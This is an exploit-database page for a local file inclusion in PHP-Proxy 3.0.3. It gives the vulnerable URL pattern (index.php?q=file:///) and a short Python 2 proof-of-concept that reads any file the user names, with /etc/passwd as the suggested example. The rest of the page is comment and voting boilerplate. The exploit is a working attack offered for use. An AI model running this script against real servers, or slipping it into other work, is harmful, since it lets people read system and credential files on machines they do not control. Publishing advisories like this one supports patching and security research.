PHP Proxy 3.0.3 Local File Inclusion

2018.11.06

Credit: Ozkan Mustafa Akkus

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-98

# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion
# Date: 04.11.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.php-proxy.com/
# Software Link: https://github.com/Athlon1600/php-proxy-app
# Version: v3.0.3
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?q=file:///[FilePath]
# PoC
#!/usr/bin/python
import urllib2, httplib, sys
print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
print "[+] usage: python " + __file__ + " http://<target_ip/domain>"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <target_ip/domain>"
exit(0)
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/index.php?q=file:///" + fd + ""
print urllib2.urlopen(URL).read()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP Proxy 3.0.3 Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.